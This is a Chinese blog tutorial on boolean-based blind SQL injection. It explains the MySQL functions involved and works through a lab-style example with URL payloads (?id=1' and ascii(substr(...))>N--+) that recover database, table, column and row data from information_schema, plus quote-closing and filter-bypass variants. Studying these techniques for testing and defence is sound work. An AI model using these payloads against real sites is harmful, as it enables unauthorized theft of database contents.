布尔盲注知识点

最新推荐文章于 2024-06-19 13:35:01 发布
最新推荐文章于 2024-06-19 13:35:01 发布
阅读量466 收藏 1
点赞数 1
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/133968302
版权

概念:布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false,构造SQL语句,利用and,or等关键字来其后的语句 truefalse使web页面返回true或者false,从而达到注入的目的来获取信息

ascii() 函数,返回字符ascii码值

    参数 : str单字符

length() 函数,返回字符串的长度

    参数 : str 字符串

left() 函数,返回从左至右截取固定长度的字符串

    参数str,length
    str : 字符串
    length:截取长度

substr()/substring() 函数 , 返回从pos位置开始到length长度的子字符串

    参数,str,pos,length
    str: 字符串
    pos:开始位置
    length: 截取长
 

注入流程
  • 求当前数据库长度
  • 求当前数据库表的ASCII
  • 求当前数据库中表的个数
  • 求当前数据库中其中一个表名的长度
  • 求当前数据库中其中一个表名的ASCII
  • 求列名的数量
  • 求列名的长度
  • 求列名的ASCII
  • 求字段的数量
  • 求字段内容的长度
  • 求字段内容对应的ASCII

常用函数

length() 返回字符串的长度,例如可以返回数据库名字的长度 substr() ⽤来截取字符串 ascii() 返回字符的ascii码 sleep(n) 将程序挂起⼀段时间,n为n秒 if(expr1,expr2,expr3) 判断语句 如果第⼀个语句正确就执⾏第⼆个语句如果错误执⾏第三个语句

substr函数原理

在构造SQL语句之时,and后面如果跟着一个大于0的数,那么SQL语句正确执行,所以利用此特性,使用substr截取字符,当截取的字符不存在,再通过ascii函数处理之后将会变成false,页面将回显错误

求当前数据库名

思路:

利用left 函数,从左至右截取字符串

截取字符判断字符的ascii码,从而确定字符

-- 从左至右截取一个字符
SELECT * from users WHERE id = 1 and (left(database(),1)='s')
-- 从左只有截取两个字符
SELECT * from users WHERE id = 1 and (left(database(),2)='se')

SELECT * from users WHERE id = 1 AND (ASCII(SUBSTR(database(),1,1)) = 115)
SELECT * from users WHERE id = 1 AND (ASCII(SUBSTR(database(),2,1)) = 101)

SELECT * from users WHERE id = 1 AND (ASCII(SUBSTR(database(),1,1)) = 115)
SELECT * from users WHERE id = 1 AND (ASCII(SUBSTR(database(),2,1)) = 101)

1.绕过:
有时候我们可能会遇到将1=1过滤掉的SQL注入点,这时候我们可以通过修改关键字来绕过过滤,比如将关键字修改为不常见的数值(如1352=1352等)。

在字符串型注入的时候我们还需要绕过单引号,将Payload修改为如下格式'and'1'='1和'or'1'='2来闭合单引号(第一个引号闭合原句中引号,原句中后面的引号拼接到语句中了
 

2.判断:
Bool盲注中通常会配套使用一些判断真假的语句来进行判定。常用的发现Bool盲注的方法是在输入点后面添加and 1=1和and 1=2(该Payload应在怀疑是整型注入的情况下使用)。

如果题目后端拼接了SQL语句,and 1=1为真时不会影响执行结果,但是and 1=2为假,页面则可能会没有正常的回显。

 例题

加上单引号,无返回数据

且注释后,有返回数据

所以为单引号闭合,存在SQL注入点

?id=1' and 1=1 --+  页面有返回

?id=1' and 1=0 --+ 页面无结果返回

 

猜数据库名长度

?id=1' and (length(database()))>7--+页面返回有数据

?id=1' and (length(database()))>8--+页面无结果返回

数据库名称长度为:8

猜数据库名(ASCII码)

?id=1' and ascii(substr(database(),1,1))>100--+ 页面返回有数据

?id=1' and ascii(substr(database(),1,1))<150--+ 页面返回有数据

一直从中间分下去,直到确定一个值对应的ascii码

通过这个方法判断出整个数据库名

猜表名

?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100--+页面返回有数据

 ?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))<150--+有返回数据

通过这个方法判断出整个表名

猜字段名

?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))>50--+   页面返回有数据

?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))<80--+返回有数据

通过这个方法判断出整个字段名

猜数据

?id=1' and (ascii(substr(( select  id users limit 0,1),1,1)))<80--+  页面返回有数据

?id=1' and (ascii(substr(( select  id users limit 0,1),1,1)))>30--+页面返回有数据

通过这个方法判断出整个数据 

访白鹿
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bool盲注
m0_64100645的博客
11-24 313
根据以上两个值可以进行一定的猜测,然后将对一个的ASCII值代入其中进行试验。第三列第一个 输入的是112 代码在上面图。当输入为101时 第一个表的字符为e。再次进行以上步骤,第二个表为users。username中第一个字符为:D。当第二个字符输入117,页面显示正确。由上面可知,数据库的长度等于8。由以上推出为username。从以上代码可得到的是:Dumb。由上面可以得到,表长度为4。说明第一个表的字符大于79。判断username的长度。第一个是s,页面显示正常。2. 判断第一个表的长度。
Bool盲注
asdfghjkl978564的博客
11-16 249
最近看见了这个Bool盲注挺有趣,做个记录! 小技巧:substr(user(),1,1)等价于substr(user() from 1 for 1) 可以绕过逗号 参考脚本模板程序: 1 import request 2 import re 3 4 pattern = re.compile(r'2014-11-16') #此处是关键字 5 6 for...
sql注入之盲注
最新发布
weixin_64815500的博客
06-19 991
sql注入关于无回显用到的盲注,sqli-labs靶场为例子讲解常用盲注类型以及函数。面试或者打ctf可用作参考
布尔盲注
m0_56107268的博客
12-04 791
布尔盲注常用函数 length() 返回字符串的长度 substr() 截取字符串 substr(a,b,c) 第一个是截取的字符串 ,第二个是截取的位置 ,第三个是截取的长度 ascii() 返回字符串的ASCII码 limit a,b 第一个字符代表查询内容的位置,第二个代表长度 布尔盲注原理: 通过网页的回显来判断读错,可以利用and < > = 来进行判断 sql语句: SELECT * FROM users WHERE id='$id' LIMIT 0,1 爆数据库 (...
pikachu(bool盲注)
ANYOUZHEN的博客
05-11 460
关于bool盲注的原理:由于对方后端对用户的显示页面进行了处理,我们无法看到返回的数据库报错内容 由于进行处理,我们在页面输入框中输入‘时不会返回数据库报错内容 输入kobe’ and 1=1# 我们可以使用select语句去判断: select ascii(substr(database(),1,1))>113; 它会返回0或者1,0是错的意思,1是对的意思 select ascii(substr(database(),1,1)>112; 通过判断0或者1 通过多次查询,我
6、盲注(bool)
weixin_51520483的博客
05-18 577
1、注意在页面不报错的情况下,如何获取bool返回值,多学习其他的获取语法。
布尔盲注python脚本.zip
12-28
布尔盲注(Boolean-Based Blind Injection)是一种常见的SQL注入攻击方式...以上就是关于布尔盲注和Python脚本的相关知识点,了解这些可以帮助我们更好地识别和防范此类攻击,同时也能在安全测试中运用这些工具和技术。
第九节 POST基于时间和布尔盲注-01
09-15
知识点: 1. HTTP POST 方法的介绍 2. POST 基于时间的盲注技术 3. POST 基于布尔盲注技术 4. Sqlmap 安全测试工具 5. 基于时间的盲注的优缺点 6. 基于布尔盲注的优缺点 7. Sqlmap 的检测技术和模式
SQL盲注利用工具
11-15
4. **布尔盲注**:通过发送一系列可能导致不同结果的查询(例如,导致错误或不产生错误),然后分析应用程序的响应来推断信息。如果应用程序在处理错误时行为不同,那么攻击者可以利用这一点来获取信息。 5. **排序...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
SQL注入基础知识点 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造...
sql注入知识点总结.pdf
02-11
了解和掌握SQL注入的相关知识点是进行网络安全防护的重要组成部分。开发者应该避免使用字符串拼接构造SQL语句,而应采用参数化查询等更安全的编码实践。同时,安全人员也需要了解SQL注入的多种攻击方式和注入点的...
mysql bool盲注_Mysql 高级盲注布尔盲注【sqli blind】
weixin_39971132的博客
01-18 173
什么是盲注 [sqli blind]?盲注通常都是专门为了对付目标页面错误处理的比较好的这种情况,也就是说,有时即使目标存在注入,因为在页面上没有任何回显,此时再想利用常规的union曝数据字段可能就不大现实了,于是后来就被人发现了盲注这种技巧,关于盲注常用类型,主要有三种,基于时间,布尔,错误[实际遇到的非常少]的盲注,不过我们今天暂时只针对布尔盲注做详细说明,关于其它的技巧,后续还会再单...
sql注入练习之bool盲注
windStudyer的专栏
05-22 1145
1.bool盲注的原理 以根据返回页面判断条件真假的注入 判断方式: 通过长度判断 length(): length(database())>=x 通过字符判断 substr():substr(database() ,1,1)= 's' 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x 2.bool盲注相关的函数 3.实验-bool盲注 实验环境:phpstudy+apache+mysql+pikachu 3.1判断注入点
SQL bool盲注和时间盲注详解
永远是少年
07-21 1026
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL bool盲注和时间盲注。 一、bool盲注和时间盲注常用函数 二、bool盲注和时间盲注payload
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6344
Less-7导出文件GET字符型注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
布尔盲注(一)
qq_45300786的博客
07-11 2314
盲注介绍: 注入攻击的本质,是把用户输入的数据当成代码执行。 这里有2个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据。 盲注所对应的是显错注入,显错注入我们之前讲过,但是很多时候, web服务器关闭了错误回显,这时候就没有办法实行SQL注入了吗? 2.常用函数 length()长度函数 substr()截取字符串 ascii()返回字符的ascii码 sleep()延迟函数 if(expr1,expr2,expr3)判断函数,有点类似于三元运算 3、
SQL注入之布尔盲注
秋水的博客
08-31 5809
布尔盲注简介 简介及使用场景: 在刚开始接触一个概念时,我们很容易顾名思义,所以在学习盲注之前的一段时间,着实不清楚盲注到底是什么。 我的理解中盲注的本质就是,在页面无法给我提供回显的时候的一中继续注入的手段。那什么是布尔盲注呢?在我们输入and 1或者and 0,浏览器返回给我们两个不同的页面,而我们就可以根据返回的页面来判断正确的数据信息。 相关函数 length()函数: ...
sql注入之布尔盲注
ikzzy的博客
12-27 301
sql注入之布尔盲注 今天我们主要讲一下布尔盲注是如何使用的,顾名思义,盲注,就是我们需要去不停的去测试,首先我们测试注入类型,然后我们再去带入相应的函数信息。布尔盲注很明显的就是ture跟fales,也就是说它会根据你输入的注入信息返回ture或者fales,也就没有了之前的报错信息。 布尔盲注里面比较常用函数是length(),测试返回字串符得长度,substr(),截取字符串,以及ascii()编码表,返回字符的ascii表。 我们就拿sqli labs-5来测试,首先我们来测试数据库得长度,即这个
【SQL注入-无回显】布尔盲注:原理、函数、利用过程
06-14 7410
【SQL注入-无回显】
SQL盲注技术原理与应用实践
在DVWA平台上进行SQL盲注需要掌握以下知识点: 1. 检查是否存在注入点:首先需要检查是否存在SQL注入点,例如使用参数1‘and1=1#进行提交,如果页面显示存在,则说明存在注入点。 2. 猜解数据库名的长度:使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值